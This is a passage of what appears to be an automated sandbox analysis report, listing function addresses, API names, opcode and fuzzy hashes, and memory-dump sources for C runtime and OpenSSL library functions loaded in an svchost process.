                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: df88937ba900795650b5eaa6d6d0e8d2eb4fbd0cb99e5a98e548c4b91da7f1bc
                                                                                              • Instruction ID: 43028ba807c5f2b3b92365ab997b1024697d1c6086bf5f5546e452a708f9be2d
                                                                                              • Opcode Fuzzy Hash: df88937ba900795650b5eaa6d6d0e8d2eb4fbd0cb99e5a98e548c4b91da7f1bc
                                                                                              • Instruction Fuzzy Hash: BF11B692B0B78982EE3D5631F40017951559FC8FC0F449076EE4E8BBDADD2DE5424600
                                                                                              Function 00007FFBAAFFD9D0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                              • String ID:
                                                                                              • API String ID: 2573137834-0
                                                                                              • Opcode ID: 087c94fe734eaef8ccf13c0be3e1a2275b33f6f0eac3206c8b224c77f0bad44b
                                                                                              • Instruction ID: 6efc5674fe2cd03ff5d3acedde9461e7aa5242634fa41aaee97d2e14afe03016
                                                                                              • Opcode Fuzzy Hash: 087c94fe734eaef8ccf13c0be3e1a2275b33f6f0eac3206c8b224c77f0bad44b
                                                                                              • Instruction Fuzzy Hash: 29617CB2A19A81C1EB159F38E04435D73AAFB50B8CF449136DB8C07A6DDFB9D894C340
                                                                                              Function 00007FFBAB04EE4C Relevance: 3.2, APIs: 2, Instructions: 181COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 25e6eba7937fd2df68da5dfd2ce53639527b20559a842f5475600718e70b472d
                                                                                              • Instruction ID: 4c15ba94dc51f5e268b92028308021aa25b44716267b2813133491b3175e43bd
                                                                                              • Opcode Fuzzy Hash: 25e6eba7937fd2df68da5dfd2ce53639527b20559a842f5475600718e70b472d
                                                                                              • Instruction Fuzzy Hash: 7251D0B1B0B28246FA7E9E3AD50067A6690AF84BE4F14C334ED7D53AE5DF3DE4214600
                                                                                              Function 00007FFBAAFE3900 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a9a5bc3d059528433e37092c63e7baec89364ff8f0eb9848d44884b16a024ff2
                                                                                              • Instruction ID: b0d800873c57fae3bdc5efa2bc8d2bb79fec86042878653c19b2e4b9ab834259
                                                                                              • Opcode Fuzzy Hash: a9a5bc3d059528433e37092c63e7baec89364ff8f0eb9848d44884b16a024ff2
                                                                                              • Instruction Fuzzy Hash: 4041BEB2B06A5581EB268E3AD00837C73A5FB44FD8F188536CE4C97B58DE39D8878310
                                                                                              Function 00007FFBAB0544E0 Relevance: 3.1, APIs: 2, Instructions: 76COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFBAB04992E,?,?,?,00007FFBAB049BEA), ref: 00007FFBAB054506
                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FFBAB054569
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1808705829-0
                                                                                              • Opcode ID: 4635e84b82b90d1698c28812b93eb62492523e2aad87e39e364d6ef591d4856a
                                                                                              • Instruction ID: d8c6707bc2729676141a32298d2e394e77166d814d3235ec852577facca66b06
                                                                                              • Opcode Fuzzy Hash: 4635e84b82b90d1698c28812b93eb62492523e2aad87e39e364d6ef591d4856a
                                                                                              • Instruction Fuzzy Hash: 1631C4A1A0E64642FA36AB71D4117FD6290AF81B80F54C535EE6D47EEBDF7CE8208700
                                                                                              Function 00007FFBAB05DC6C Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: bc0705010fb45789ecfdca3bfe044c1841a352d68a7db18108ebf6cc05923ffb
                                                                                              • Instruction ID: 49201f772703dfaf3ecd7787c15a18a9a4dd282df76f392e2993b1cea61b9eea
                                                                                              • Opcode Fuzzy Hash: bc0705010fb45789ecfdca3bfe044c1841a352d68a7db18108ebf6cc05923ffb
                                                                                              • Instruction Fuzzy Hash: 6B11B2A2629A8281DA31DB35E404669A761BB84BF4F54C336EE7D47BE9CF7CD0608740
                                                                                              Function 00007FFBAB05C604 Relevance: 2.6, APIs: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 918212764-0
                                                                                              • Opcode ID: 6458880a059b35e5152587c1de7c6f389fe6edfe0a1c84f4a9904da4d9ef96a5
                                                                                              • Instruction ID: 9ab25ae7369af8bc98f97985676a13eee1fb0917ad4ec6d3e065bb9a68db6a2a
                                                                                              • Opcode Fuzzy Hash: 6458880a059b35e5152587c1de7c6f389fe6edfe0a1c84f4a9904da4d9ef96a5
                                                                                              • Instruction Fuzzy Hash: F721D4A1F1A68241EE729771E4A06BD1A829F447A4F05E339DD3D477F2DEACE5A48300
                                                                                              Function 00007FFBAB05C878 Relevance: 1.6, APIs: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 1ed12f836a697f6605108e8bddeeb1876b84fed687d500a12e50fb89f0b3d145
                                                                                              • Instruction ID: 8dd8ba5853dff2b8cf0502a0ab00af6c899efcec02c4c211b07291dca094412c
                                                                                              • Opcode Fuzzy Hash: 1ed12f836a697f6605108e8bddeeb1876b84fed687d500a12e50fb89f0b3d145
                                                                                              • Instruction Fuzzy Hash: F641037291A64183EA368B38E4416BD73A0EB55B50F11D235DEAE83BA0CF3CE812C750
                                                                                              Function 00007FFBAB05D5CC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 7c4aee51ae4b26d18ed65c2b1e303e1887308baf6f27f23d183e8e6e7fb07058
                                                                                              • Instruction ID: 5a5802f4eba1da3149af535dcccbe9c7d856f216d7136923c407de136d402b31
                                                                                              • Opcode Fuzzy Hash: 7c4aee51ae4b26d18ed65c2b1e303e1887308baf6f27f23d183e8e6e7fb07058
                                                                                              • Instruction Fuzzy Hash: A23182B1E1A61289E7376B75D841B7D2650AB40B94F41C33ADE3D077F2CE7CA8628720
                                                                                              Function 00007FFBAB0679E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 0e53a34abfed05013c821fe6a07fce241fe07a17664203467ba6e381cc40e880
                                                                                              • Instruction ID: 50342eae37b9f2c672746213361e29b75ab59d95fe6fbadbd4ea8d220bcd5789
                                                                                              • Opcode Fuzzy Hash: 0e53a34abfed05013c821fe6a07fce241fe07a17664203467ba6e381cc40e880
                                                                                              • Instruction Fuzzy Hash: 7E21DA7261968186DB728F38D45037976A1EBC4B54F548338EF6D876EADF7CD4208700
                                                                                              Function 00007FFBAB04F0D8 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 2d8476ae60e3300321bf30d7a922cdbd28b0c9d19814793c568c8b6a1dbe1a92
                                                                                              • Instruction ID: 992aca01db325ce885c61d6cd7db9b139f6615b6696ec7fc8ed48bcb912fcefa
                                                                                              • Opcode Fuzzy Hash: 2d8476ae60e3300321bf30d7a922cdbd28b0c9d19814793c568c8b6a1dbe1a92
                                                                                              • Instruction Fuzzy Hash: B001A5B1B0974541EA2ADB72D901069A691BF86FE0F48C630DE7C13BF6DE3CD4214300
                                                                                              Function 00007FFBAB066684 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB055C70: HeapAlloc.KERNEL32(?,?,00000000,00007FFBAB056107), ref: 00007FFBAB055CC5
                                                                                              • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FFBAB066985,?,?,?,?,?,00007FFBAB06808C), ref: 00007FFBAB0666CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCriticalHeapInitializeSection
                                                                                              • String ID:
                                                                                              • API String ID: 2538999594-0
                                                                                              • Opcode ID: c7b1acbcfe87266fc0f9bebfcb351de7459ad498e17c031b53c3222c8f04b247
                                                                                              • Instruction ID: 1f1123a297f335e483bbfbf3727bece9c094493d11bff8b4a1c9f2617e832db3
                                                                                              • Opcode Fuzzy Hash: c7b1acbcfe87266fc0f9bebfcb351de7459ad498e17c031b53c3222c8f04b247
                                                                                              • Instruction Fuzzy Hash: 6F110E7272978186E6258B25E1401AD6760EB41B90FA8C238EB7D43BD5CF38E472C700
                                                                                              Function 00007FFBAB057E44 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 3bec28bef11bc3bba54c3e571dc6c374f3ad8b44711cf08515c867af371c6c11
                                                                                              • Instruction ID: 6b333187b2ca992e2a21cbe84c660bed13a8ed3b9809a1ac04535805b4beed1e
                                                                                              • Opcode Fuzzy Hash: 3bec28bef11bc3bba54c3e571dc6c374f3ad8b44711cf08515c867af371c6c11
                                                                                              • Instruction Fuzzy Hash: E8111772A05B059CEB21DFB0D4812ED37B4FB08358F508636EA5D12B6ADF34D1A5C390
                                                                                              Function 00007FFBAB04E9F0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 44c91d0d74f90cc200fa1dd173db0d6c63e3f0b24ef1e4a101104fe5a026268a
                                                                                              • Instruction ID: b36e95fbd317d9664b89334df90f7c9b816218cbdf04d4ad6617543f9939a69f
                                                                                              • Opcode Fuzzy Hash: 44c91d0d74f90cc200fa1dd173db0d6c63e3f0b24ef1e4a101104fe5a026268a
                                                                                              • Instruction Fuzzy Hash: 51E022B1A1E64289EF3E6BB4E58117C6150AF047F0F54C330EF3C026E6DE38A4B88201
                                                                                              Function 00007FFBAB055C70 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocHeap
                                                                                              • String ID:
                                                                                              • API String ID: 4292702814-0
                                                                                              • Opcode ID: 9e6ab98372be8dbbc01cc3b2e490f32f81acd33fe3b8fcc01c806bca5ac95083
                                                                                              • Instruction ID: 6429dc8122838f3444c86a0e52a4349a974b24975017904e5669744e14452dc3
                                                                                              • Opcode Fuzzy Hash: 9e6ab98372be8dbbc01cc3b2e490f32f81acd33fe3b8fcc01c806bca5ac95083
                                                                                              • Instruction Fuzzy Hash: D0F04FE0B0F24649FE7656B1D4117B856906F84780F58D134CD2EC6BE1DD2DE8A04310

                                                                                              Non-executed Functions

                                                                                              Function 00007FFBAB49A8B0 Relevance: 114.5, APIs: 62, Strings: 3, Instructions: 725COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$L_sk_freeL_sk_num$L_sk_valueO_free$L_sk_dup$O_memcmpmemcmpmemcpy
                                                                                              • String ID: P$ssl\statem\statem_srvr.c$tls_early_post_process_client_hello
                                                                                              • API String ID: 642479057-77815245
                                                                                              • Opcode ID: c447f6e93f942091da1cfdd80307a043e06866bcd382f3df36c028cff0107e0e
                                                                                              • Instruction ID: 4fb428abde8c3e44dcbb5f3be11bdb9bcbee855efc1bdc1159571044b84d4b67
                                                                                              • Opcode Fuzzy Hash: c447f6e93f942091da1cfdd80307a043e06866bcd382f3df36c028cff0107e0e
                                                                                              • Instruction Fuzzy Hash: 48727AB1A0A78686EB629B31D4D52BD23A1FB44B48F14C432DE6D876B6DE3DE845C301
                                                                                              Function 00007FFBAB438140 Relevance: 91.3, APIs: 40, Strings: 12, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: M_locate_constR_new$M_get_intM_get_uintO_freeO_strdup$O_mallocO_reallocR_pop_to_markR_set_debugR_set_errorR_set_markT_freememset
                                                                                              • String ID: add_provider_groups$ssl\t1_lib.c$tls-group-alg$tls-group-id$tls-group-is-kem$tls-group-name$tls-group-name-internal$tls-group-sec-bits$tls-max-dtls$tls-max-tls$tls-min-dtls$tls-min-tls
                                                                                              • API String ID: 1973439691-538443449
                                                                                              • Opcode ID: 1a615cb7a5e931d0d5ccc9f0736496d10e9277377a0fbad70ecfd51b3f16c65c
                                                                                              • Instruction ID: c4b21673c2bd0ae669c9c2a8fb7a315c8cd7de82e2ef49e6a491589bcc41fe97
                                                                                              • Opcode Fuzzy Hash: 1a615cb7a5e931d0d5ccc9f0736496d10e9277377a0fbad70ecfd51b3f16c65c
                                                                                              • Instruction Fuzzy Hash: 9DB1AEA6A0B61381FE66EB36D4811BC67A1AF84780F48C435DD2D46BFAEE2CF545C311
                                                                                              Function 00007FFBAB498414 Relevance: 82.7, APIs: 45, Strings: 2, Instructions: 462COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugX509_free$L_sk_new_nullR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                              • API String ID: 3750526228-3872095317
                                                                                              • Opcode ID: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                              • Instruction ID: ce15aadebadb48cb442a423b9514c074bc6e13b97851f999dbccac4f2376d840
                                                                                              • Opcode Fuzzy Hash: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
